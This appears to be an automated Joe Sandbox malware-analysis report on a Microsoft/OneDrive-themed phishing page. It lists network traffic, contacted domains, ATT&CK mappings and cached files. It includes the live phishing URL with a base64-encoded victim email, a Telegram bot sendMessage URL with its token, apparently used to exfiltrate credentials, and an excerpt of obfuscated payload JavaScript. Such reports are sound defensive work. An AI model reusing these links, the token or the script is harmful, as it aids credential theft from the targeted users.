Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.troj.win@16/22@28/11
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,10506442713732775358,2264122065710547081,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,10506442713732775358,2264122065710547081,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
Ingress Tool Transfer
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.opensource.org/licenses/mit-license.php)0%URL Reputationsafe
https://api.ipify.org/?format=json0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
openfpcdn.io
13.32.99.97
truefalse
    unknown
    d26p066pn2w0s0.cloudfront.net
    13.32.27.129
    truefalse
      unknown
      ipfox.co.uk
      107.178.102.96
      truefalse
        unknown
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          unknown
          sni1gl.wpc.omegacdn.net
          152.199.21.175
          truefalse
            unknown
            www.google.com
            142.250.184.228
            truefalse
              unknown
              api.ipify.org
              104.26.13.205
              truefalse
                unknown
                api.telegram.org
                149.154.167.220
                truetrue
                  unknown
                  aadcdn.msftauth.net
                  unknown
                  unknowntrue
                    unknown
                    logo.clearbit.com
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://ipfox.co.uk/pages/errorss.jsfalse
                        unknown
                        https://cdnjs.cloudflare.com/ajax/libs/UAParser.js/0.7.31/ua-parser.min.jsfalse
                          unknown
                          https://logo.clearbit.com/ag.state.mn.usfalse
                            unknown
                            https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVztrue
                              unknown
                              https://api.telegram.org/bot7107686937:AAGoqXlr31lmLR7qgVo_FFgSjoOSDhGFxSU/sendMessagefalse
                                unknown
                                https://api.ipify.org/?format=jsonfalse
                                • URL Reputation: safe
                                unknown
                                https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svgfalse
                                  unknown
                                  https://ipfox.co.uk/favicon.icofalse
                                    unknown
                                    https://ipfox.co.uk/pages/thanks.htmlfalse
                                      unknown
                                      https://ipfox.co.uk/Captcha-Onedrive2024-8281969true
                                        unknown
                                        https://openfpcdn.io/botd/v1false
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://fingerprint.com)chromecache_54.2.dr, chromecache_53.2.drfalse
                                            unknown
                                            http://www.opensource.org/licenses/mit-license.php)chromecache_54.2.dr, chromecache_53.2.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.youtube.comchromecache_59.2.drfalse
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.17.24.14
                                              cdnjs.cloudflare.comUnited States
                                              13335CLOUDFLARENETUSfalse
                                              13.32.27.44
                                              unknownUnited States
                                              7018ATT-INTERNET4USfalse
                                              107.178.102.96
                                              ipfox.co.ukUnited States
                                              53755IOFLOODUSfalse
                                              13.32.99.97
                                              openfpcdn.ioUnited States
                                              16509AMAZON-02USfalse
                                              149.154.167.220
                                              api.telegram.orgUnited Kingdom
                                              62041TELEGRAMRUtrue
                                              239.255.255.250
                                              unknownReserved
                                              unknownunknownfalse
                                              152.199.21.175
                                              sni1gl.wpc.omegacdn.netUnited States
                                              15133EDGECASTUSfalse
                                              142.250.184.228
                                              www.google.comUnited States
                                              15169GOOGLEUSfalse
                                              104.26.13.205
                                              api.ipify.orgUnited States
                                              13335CLOUDFLARENETUSfalse
                                              13.32.27.129
                                              d26p066pn2w0s0.cloudfront.netUnited States
                                              7018ATT-INTERNET4USfalse
                                              IP
                                              192.168.2.4
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1542143
                                              Start date and time:2024-10-25 15:44:00 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 3m 16s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:browseurl.jbs
                                              Sample URL:https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal52.phis.troj.win@16/22@28/11
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.185.110, 64.233.184.84, 34.104.35.123, 142.250.186.138, 216.58.212.170, 142.250.185.106, 142.250.74.202, 142.250.185.170, 142.250.186.74, 172.217.18.10, 142.250.185.202, 216.58.206.42, 142.250.181.234, 142.250.185.234, 142.250.185.74, 142.250.186.106, 142.250.184.202, 142.250.186.42, 142.250.185.138, 199.232.210.172, 192.229.221.95, 172.217.23.99
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVz
                                              No simulations
                                              No context
                                              No context
                                              No context
                                              No context
                                              No context
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                              Category:downloaded
                                              Size (bytes):10029
                                              Entropy (8bit):7.967085798668292
                                              Encrypted:false
                                              SSDEEP:192:3ooqsgbz8MnHIUkb/Hmpc8Hj1LF05YgC6KGvQQ7gx2Wpxb9VooM:3ooqfAVAOeTGv7gN9VooM
                                              MD5:5A25447E88DFD26CE0628162D4B01F20
                                              SHA1:03750131E5B4C2AADA632018BE5FB00E5F4519A3
                                              SHA-256:F6EED444BDD54E138B26E353575CD68E9E36B967EBAE4AA104E291CEC7B3B90A
                                              SHA-512:DD43CBF07DE903C0F37EC32F38F9373F36A3F9B479DAC90CE13679CE8CC9505CBCF20E071E4A10D3C3707BAD1C37AEED70FBBB10D476345A028D4B2B2997ABC0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://logo.clearbit.com/ag.state.mn.us
                                              Preview:.PNG........IHDR.............L\....&.IDATx....eUu7..>........z.iz.A.f.).....A.....(....C..D.11...)Q.>g.%.ED.Q..................9..zM7-......z..z....}.......x3t.sD.......@..+..SW.....:L].t....0u..a......@..+..SW.....:L].t....0u..a......@..+..SW.....:L].t....0u..a......@..+..SW.....:L].t..T..@i.D....aUD,. . .4.B......f...Z8o..e....T....]{6n.z..gFsl.F]..!Fe.Y.@"...B.D.p>cZ.d.....W.....|..g7.n.)K.%..d...H"z.g.....cVU.F...L.fs}..B.JS.l..z.0.,.;.q...5.a....-nu.X... .~...}.".@..<..g.t.%..9..e$.s......w...{.g...F.`W.X...O9...1@.,@X.R. 42...w.r..?..'#f..a.@.Ir.HD......:...[..WG....-.B....6.{.=.?..7.ywCr.bV...1e..5.Uh...]Y.+.&.0....c.D...I{........iS..Qc..5u .....R!.7'G8....k.4...]...U..n..@d....|...+Vv.7..]..o|..#..$..@=~....7u..D.p.mw]..7e9.I=....J...7...;...e..(.../O....c#`.n......;R..Oz.&U..]s.n..........rg.Y..".......WggM]..m.<../M...l..&".#..d.s9.<.?/.........:.c.|.IG/[..$...U.....g.;6.|......z....&.m7M.NM!..{.Q._....%G....M..Y....*Zu..7^}.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (15267), with no line terminators
                                              Category:downloaded
                                              Size (bytes):15267
                                              Entropy (8bit):5.444165107700632
                                              Encrypted:false
                                              SSDEEP:384:iQpZtJcfNNi+RCSkd2jlfbEQEkRN+n5qAy:inVNxRCbdAlAion5C
                                              MD5:EF063987544B4FB94FA1D8AA1F57A1BD
                                              SHA1:C48C2FCEEAFE164096C565B87727E7FA9C3D07F9
                                              SHA-256:02EA3DEC8A4DD3072385528E010E2231083736143C4EB1C6741DC103ADE99BF4
                                              SHA-512:5C6FEA34BEF3C1280609E81DB373BD4C32AF6ADFEACD239A793D581E0D88C7BD2F8044550C32B8D6DD8DE4AB73B5650DD08FCAF1D5DF3F044654B1733459CF6C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/UAParser.js/0.7.31/ua-parser.min.js
                                              Preview:!function(r,d){"use strict";function i(i){for(var e={},o=0;o<i.length;o++)e[i[o].toUpperCase()]=i[o];return e}function n(i,e){return typeof i===p&&-1!==F(e).indexOf(F(i))}function t(i,e){if(typeof i===p)return i=i.replace(/^\s\s*/,w).replace(/\s\s*$/,w),typeof e==l?i:i.substring(0,255)}function s(i,e){for(var o,a,r,n,t,s=0;s<e.length&&!n;){for(var b=e[s],w=e[s+1],l=o=0;l<b.length&&!n;)if(n=b[l++].exec(i))for(a=0;a<w.length;a++)t=n[++o],typeof(r=w[a])===c&&0<r.length?2===r.length?typeof r[1]==u?this[r[0]]=r[1].call(this,t):this[r[0]]=r[1]:3===r.length?typeof r[1]!==u||r[1].exec&&r[1].test?this[r[0]]=t?t.replace(r[1],r[2]):d:this[r[0]]=t?r[1].call(this,t,r[2]):d:4===r.length&&(this[r[0]]=t?r[3].call(this,t.replace(r[1],r[2])):d):this[r]=t||d;s+=2}}function e(i,e){for(var o in e)if(typeof e[o]===c&&0<e[o].length){for(var a=0;a<e[o].length;a++)if(n(e[o][a],i))return"?"===o?d:o}else if(n(e[o],i))return"?"===o?d:o;return i}function b(i,e){if(typeof i===c&&(e=i,i=d),!(this instanceof b))retur
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                              Category:dropped
                                              Size (bytes):420812
                                              Entropy (8bit):5.240337081853052
                                              Encrypted:false
                                              SSDEEP:12288:cmX5fA1PL9zAb4PoEXYeb4ZQ+ZgAMKO89nDaj5Fl8YTayHdrnRXIpVy0D:cmpIRAkXVcQ4gKddD8Hlbay9ZIjD
                                              MD5:EB2553EE453B5B2C57A073533D3FEFEF
                                              SHA1:9A9A7BA682537CC3DD8B5EEF07A1E35BD81C54EE
                                              SHA-256:168073FDAF434FE499290D742A7EBE1861FC4505B792049DE05C372BEDAFC562
                                              SHA-512:D22047474D0DCE7CFD5FC8BFEAB4AA6C4A6923078E78A52DCA9B33324F1BA812C02588E0EBDE8A81AF2FCF659DD31137F33904F0616EC99A767C9A8527D5FEB6
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(_0x44808d,_0x4c0763){function _0x539e6a(_0x33c75d,_0x21fb29,_0x21c93d,_0x28626d,_0x3410d9){return _0x2cb6(_0x28626d- -0x394,_0x33c75d);}const _0x258122=_0x44808d();function _0x3bdd2d(_0x52d603,_0x1c64a6,_0x109c9f,_0x1af723,_0x134c62){return _0x2cb6(_0x52d603-0x1ed,_0x109c9f);}function _0x4390d9(_0x471409,_0xa9db36,_0x5e1809,_0xdf4f81,_0x85a58f){return _0x2cb6(_0x471409-0x2f,_0x5e1809);}function _0x59e3aa(_0x3cc6ee,_0x24baa3,_0x41911a,_0x18501d,_0x27d8df){return _0x2cb6(_0x27d8df- -0x249,_0x24baa3);}function _0x54bde6(_0x59b925,_0x11a0f5,_0x251a9,_0x353b87,_0x4b5541){return _0x2cb6(_0x11a0f5- -0x22,_0x353b87);}while(!![]){try{const _0x16e448=-parseInt(_0x54bde6(0x15b9,0xccc,0x847,'inHh',0x91c))/(0x3*-0x1a6+0x16*-0x12b+0x1ea5)+parseInt(_0x3bdd2d(0xde9,0x563,'uInL',0x137f,0x110e))/(0x259*-0x5+-0x2be*0x4+0x16b7)*(-parseInt(_0x54bde6(0xd98,0xd9b,0x1345,'r#@m',0x47c))/(-0x189b*-0x1+0xba1*-0x1+-0xcf7))+parseInt(_0x59e3aa(0x828,'uInL',-0x8a0,0x668,-0x46))/(0x4*0x753+0x205d+0x2b*-0x16
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):3651
                                              Entropy (8bit):4.094801914706141
                                              Encrypted:false
                                              SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                              MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                              SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                              SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                              SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                              Malicious:false
                                              Reputation:low
                                              URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):3651
                                              Entropy (8bit):4.094801914706141
                                              Encrypted:false
                                              SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                              MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                              SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                              SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                              SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                              Malicious:false
                                              Reputation:low
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):10029
                                              Entropy (8bit):7.967085798668292
                                              Encrypted:false
                                              SSDEEP:192:3ooqsgbz8MnHIUkb/Hmpc8Hj1LF05YgC6KGvQQ7gx2Wpxb9VooM:3ooqfAVAOeTGv7gN9VooM
                                              MD5:5A25447E88DFD26CE0628162D4B01F20
                                              SHA1:03750131E5B4C2AADA632018BE5FB00E5F4519A3
                                              SHA-256:F6EED444BDD54E138B26E353575CD68E9E36B967EBAE4AA104E291CEC7B3B90A
                                              SHA-512:DD43CBF07DE903C0F37EC32F38F9373F36A3F9B479DAC90CE13679CE8CC9505CBCF20E071E4A10D3C3707BAD1C37AEED70FBBB10D476345A028D4B2B2997ABC0
                                              Malicious:false
                                              Reputation:low
